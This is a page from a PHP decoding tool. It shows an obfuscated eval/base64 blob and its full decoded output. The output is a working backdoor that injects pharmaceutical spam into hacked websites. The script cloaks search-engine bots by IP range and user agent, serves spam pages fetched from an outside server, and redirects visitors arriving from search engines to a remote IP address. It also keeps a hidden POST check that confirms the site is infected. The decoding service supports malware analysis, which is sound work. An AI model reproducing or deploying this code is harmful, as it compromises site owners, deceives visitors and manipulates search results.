Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode('pRlrc9u48bM70/+AaBhTjGmJol5WbNpJHefuZppLqiid6diOBiJBiRVFMiAl..

Decoded Output download

if (!defined('frmDs')){
	define('frmDs' ,1);
	error_reporting(0);
	
	function frm_dl ($url) {
		if (function_exists('curl_init')) {
			$ch = curl_init($url);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			$out = curl_exec ($ch);
			if (curl_errno($ch) !== 0) $out = false;
			curl_close ($ch);
		} else {$out = @file_get_contents($url);}
		return trim($out);
	}
	
	function frm_crpt($in){
		$il=strlen($in);$o='';
		for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
		return $o;
	}
	
	function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
		$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
		$fe = file_exists($f);
		if(!$fe || time() - filemtime($f) > 60 * $cmtime)
		{
			$dlc=frm_dl($link);
			if($fe && $dlc===false) 
				@touch($f);
			else
			{
				if($fe && empty($dlc) && $toe) 
				{
					@touch($f);
				}
				else
				{
					if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
					else{return $dlc;}
				}
			}
		}
		$fc = @file_get_contents($f);
		return ($fc)?frm_crpt($fc):'';
	}
	
	function frm_isbot(){
		$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
		if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
		$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
					array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
					array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
		foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
		if(!$ua)return true;
		$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
		foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
		$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
		$hba=array('google','msn','yahoo');
		if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
		return false;
	}
	
	function frm_tmpdir(){
		$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
            if ($t = getenv($v)) {$fs[]=$t;}
        }
        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
        $fs[]='.';
        
        foreach ($fs as $f){
        	$tf = $f.'/'.md5(rand());
        	if($fp = @fopen($tf, 'w')){
        		fclose($fp);
        		unlink($tf);
        		return $f;
        	}
        }
		return false;
	}

	function frm_seref(){
		$r = @strtolower($_SERVER["HTTP_REFERER"]);
		$ses = array('google','bing','yahoo','ask','aol');
		foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
		return false;
	}
	
	function frm_havekey($s=false){
		$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
		$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
		if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
		foreach ($nks as $n)if(preg_match("/(|_)$n(|_)/" , $k)) return $n;
		return '';
	}
	
	function frm_strtonum($Str, $Check, $Magic) {
		$Int32Unit = 4294967296;
		$length = strlen($Str);
		for ($i = 0; $i < $length; $i++) {
			$Check *= $Magic;
			if ($Check >= $Int32Unit) {
				$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
				$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
			}
			$Check += ord($Str{$i});
		}
		return $Check;
	}

	function frm_chhash($String) {
		$Check1 =frm_strtonum($String, 0x1505, 0x21);
		$Check2 = frm_strtonum($String, 0, 0x1003F);
		$Check1 >>= 2;
		$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
		$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
		$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
		$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
		$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
		$Hashnum = ($T1 | $T2);
		$CheckByte = 0;
		$Flag = 0;
		$HashStr = sprintf('%u', $Hashnum) ;
		$length = strlen($HashStr);
		for ($i = $length - 1;  $i >= 0;  $i --) {
			$Re = $HashStr{$i};
			if (1 === ($Flag % 2)) {
				$Re += $Re;
				$Re = (int)($Re / 10) + ($Re % 10);
			}
			$CheckByte += $Re;
			$Flag ++;
		}
		$CheckByte %= 10;
		if (0 !== $CheckByte) {
			$CheckByte = 10 - $CheckByte;
			if (1 === ($Flag % 2) ) {
				if (1 === ($CheckByte % 2)) {
					$CheckByte += 9;
				}
				$CheckByte >>= 1;
			}
		}
		return '7'.$CheckByte.$HashStr;
	}
	
	function frm_chpr($url,$td){
		$ch=frm_chhash($url);
		$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
		if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
	}
	
	function frm_red($k){
		if(!frm_isbot() && frm_seref()){
			$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
			$s=@urlencode($_SERVER['HTTP_REFERER']);
			die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
		}
	}
	
	$tdir = frm_tmpdir();
	$isb=frm_isbot();
	$k=frm_havekey();
	$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
	if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
	if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
		$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
		$sp = "http://mpdicteov.rr.nu/stat/feed.php?pa=$parg&h=$host";
		//
		$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
		if($isb && ($ppr = frm_chpr($tp)) > 1){
			$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
			if($pc) die($pc);
		}
		//
		$ruri = strtolower($_SERVER['REQUEST_URI']);
		$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
		if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
			frm_red($k);
			die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
		}	
		if (($ruri=='/' || $ruri=='/index.php') && $isb) {
			$c=frm_getcache($tdir, $sp ,60*24);
			if($c)die($c);
		}
		//
		if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
			if(strpos($sdl, '|'.$ruri.'|') !== false){
				frm_red($k);
				die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
			}
		}
	}
	if($k) frm_red($k);
}

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode('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')));

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 3670103e06063a8f030f5a51f83424ac
Eval Count 1
Decode Time 88 ms